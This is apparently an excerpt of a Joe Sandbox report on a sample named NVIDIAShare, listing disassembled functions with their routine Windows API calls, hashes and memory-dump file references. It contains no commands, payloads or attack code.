Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 92711f754a5361c45b7c061309e0871fa9a9a3292029e34f057b781c755bd335
Instruction ID: d37cd224c35d60a75ac3845788b527c85c020bc1ce6cd42a0970a20fb95f1b6a
Opcode Fuzzy Hash: 92711f754a5361c45b7c061309e0871fa9a9a3292029e34f057b781c755bd335
Instruction Fuzzy Hash: B701717A200309AAD7219F64DC45F9B77BCFF08710F404422FA8597144D3799914CBA5

Function 01006C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(01006DDF,00000000,00000400), ref: 01006C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 01006C95

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: b097c811c3cbfd300585c694e25bacdf350e3035f8d87cab83f701e0eaf27b16
Instruction ID: aaf3ce3f98da10f8d30ac02543ddfaa991c6f3c05fc117a96e6c58695c4badb8
Opcode Fuzzy Hash: b097c811c3cbfd300585c694e25bacdf350e3035f8d87cab83f701e0eaf27b16
Instruction Fuzzy Hash: 82D0C731344304BFFA550A614D46F2A7B9DBF45B55F14C4047795D80D0C67A94249715

Function 010319F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,010319EF,?,?,00000008,?,?,0103168F,00000000), ref: 01031C21

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: ee64f2346ce76992b536436887bbcbab1efd998db828218efa40dafd02960227
Instruction ID: 3e0140f2afd3cd21a77705dc58de485500983fee187965b91e2a98506531ecb0
Opcode Fuzzy Hash: ee64f2346ce76992b536436887bbcbab1efd998db828218efa40dafd02960227
Instruction Fuzzy Hash: 76B14A312206089FE759CF2CC486B657BE4FF89365F258698E9D9CF2A1C335D992CB40

Function 0100B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0100B16B

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 03c409a45f1f7f2410b36f0bf6e477ecb1f5369465c30205aeb8e4465b608701
Instruction ID: 86870ecc5428a4c327d346f5e3f011fe405db3b60f1d97de61280db7d57da781
Opcode Fuzzy Hash: 03c409a45f1f7f2410b36f0bf6e477ecb1f5369465c30205aeb8e4465b608701
Instruction Fuzzy Hash: CAF03AB8E002088FDB39CB18EA966D973F5FB98355F104695E69593384C3B9B9C08F61

Function 010040FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

gj, xrefs: 010041BC

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 60724046d42dcf0146637d10dda6f31e514f02c62f38a124a0285aa7955cd054
Instruction ID: 752f7042f31c51b78c0ccc0818ba6546e2cc9061ea4376466ba587d658735294
Opcode Fuzzy Hash: 60724046d42dcf0146637d10dda6f31e514f02c62f38a124a0285aa7955cd054
Instruction Fuzzy Hash: 73C147729183418FC354CF29D88065AFBE2BFC8208F19892DE9D8DB311D734E949DB96

Function 0101F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0101F3A5), ref: 0101F9DA

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 51366c172b3b3be880f8c42bae8656c027fdfeca031f8cf555cf94c686fd7b3c
Instruction ID: f3e361959f6a4ff04e6f11a12ddb433cc666aa249d1544aae616b5a751f8af56
Opcode Fuzzy Hash: 51366c172b3b3be880f8c42bae8656c027fdfeca031f8cf555cf94c686fd7b3c
Instruction Fuzzy Hash:

Function 01010723 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

, xrefs: 01010761

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: f9f1c2bed15b44f839f0c6247bb41c9584460cb63a71212a500cbf4f9e6b509d
Instruction ID: c73d31279be93d2b3240f60ee4e351777b17dde0149cdc0c34fbd81bee411ab1
Opcode Fuzzy Hash: f9f1c2bed15b44f839f0c6247bb41c9584460cb63a71212a500cbf4f9e6b509d
Instruction Fuzzy Hash: DC118671E047069EE7698F5DD4557AABBE4BB04710F14C82EE5EBE3688C279A180CF00

Function 0102C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0102C030

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 544a1257402eaa7d5b1d74b5e2a583496d349f09e7f55f9f7bded46059a595af
Instruction ID: 3e735b2a76f39c126791840c5d54c00fb7c4107a881289deb42e9d21441d9f7b
Opcode Fuzzy Hash: 544a1257402eaa7d5b1d74b5e2a583496d349f09e7f55f9f7bded46059a595af
Instruction Fuzzy Hash: F1A02430101100CFC310CF30574C30C37FC75041C13050015F0C4C4014D77D44505700

Function 010162CA Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction ID: 62cccbdc43b68e477a311087bd8f9b71023535ee7635053a3305f203a3706297
Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction Fuzzy Hash: 7D62F4716047858FCB25CF28C8906F9BBE1BF95304F08896ED8DA8B34AD779E545CB11

Function 010177EF Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction ID: ce37d6de703377c768d4322ab93539e7aeac476b3c343bd4677707ed6ae07d6e
Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction Fuzzy Hash: C062C7716083498FCB15CF28C8905B9BBE1BF95304F0889AEEDDA8B34AD734E945CB55

Function 0100F461 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction ID: d6b1ed628d37114219d5566661900bf6946cc371e29045e585847e90bea51173
Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction Fuzzy Hash: 77524C72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE99597255D334EA19CB86

Function 01017153 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aa9073c077dd5454fc41fc2e35bbf441b9493b9c46813b017af83cb97d3bd00
Instruction ID: 5ef0859d00099ad22d0cfae520f2a026f276146373d0e16c491d919c685d5cad
Opcode Fuzzy Hash: 8aa9073c077dd5454fc41fc2e35bbf441b9493b9c46813b017af83cb97d3bd00
Instruction Fuzzy Hash: 4412D0B06047068FC729CF28C890AB9B7E1FF98304F14892EE9D6C7785E778A595CB45

Function 0100C426 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b76781ff3390ba8bc4293c8fad1f38852517afb9157594c4fdb3c970368d963
Instruction ID: 0db611fa1acf40e78918e1be0f439bb13950e3b9f46c10fe9b27baa3b9622239
Opcode Fuzzy Hash: 8b76781ff3390ba8bc4293c8fad1f38852517afb9157594c4fdb3c970368d963
Instruction Fuzzy Hash: 64F1AA716083018FF35ACE28CA8866EBBE1EF89314F154BAEF5C597291D730E9458B42

Function 01016CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 868f39b16884fb11f40edc9db978b3127d72f6f615bb4d612f0cf766dc335042
Instruction ID: 1295bdb183c298edae024026743835133a9c81a3da7a28f0726a572f251ba9b8
Opcode Fuzzy Hash: 868f39b16884fb11f40edc9db978b3127d72f6f615bb4d612f0cf766dc335042
Instruction Fuzzy Hash: 0FD1E571A083418FDB25DF28C84079BBBE1BF89308F08456DF9C99B24AD779E944CB56

Function 0100E9B7 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cdf1e483d80e8f7f718a73129c6964be52e9647d7628bf0892bb62da8054e69
Instruction ID: e63063db3da6cc0b46d332e89f6e7d38fbf5936b342dfb87937630a6827fb1f8
Opcode Fuzzy Hash: 3cdf1e483d80e8f7f718a73129c6964be52e9647d7628bf0892bb62da8054e69
Instruction Fuzzy Hash: DAE16DB95083948FD315CF19D98046BBFF0AF9A300F49095EF9C497352D236EA19DB92

Function 01014088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction ID: 0e71baa4b98d31938451221d1f045e8a8be1f53dc6e5eb7497dead484dbbf9dc
Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction Fuzzy Hash: CD9143B030034A8BEB25EE68D894BFE77D5EBA0304F54092DEAD6C72C5DB789585C351

Function 010143BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: 17ebbe5ab46b511d7d505b565235103b9e696ffff0de12b763c1e5597a2c27b6
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 1E815C713443468BEB25DE68C8D0BFD77D4AB94308F04092DEAC6CB69ADF7885858752

Function 010251C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64c6c010835b2e237667a447b11e2f87ae8f8ab2989e7b45553c4c40e93a0b13
Instruction ID: 2a4a1d2b4c88d1a333736881aae1f1735f2a194d99cc3c33aeb41a62722d7bb2
Opcode Fuzzy Hash: 64c6c010835b2e237667a447b11e2f87ae8f8ab2989e7b45553c4c40e93a0b13
Instruction Fuzzy Hash: 0561A83160073966EBB89A6C6C947FE63D4EB13210F04959AFAC3DF2C1D691D84A861D

Function 01024F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction ID: 340b8eb8a6e8c06bbba6cc4c00c2b3dd21337ad6c37c58b72ddc8bd1a5eedc0b
Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction Fuzzy Hash: 26518860300B3557EFB9456C8C99FFF2BC99B52200F58089AEBC3CB692D609E545C39E

Function 0100EFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
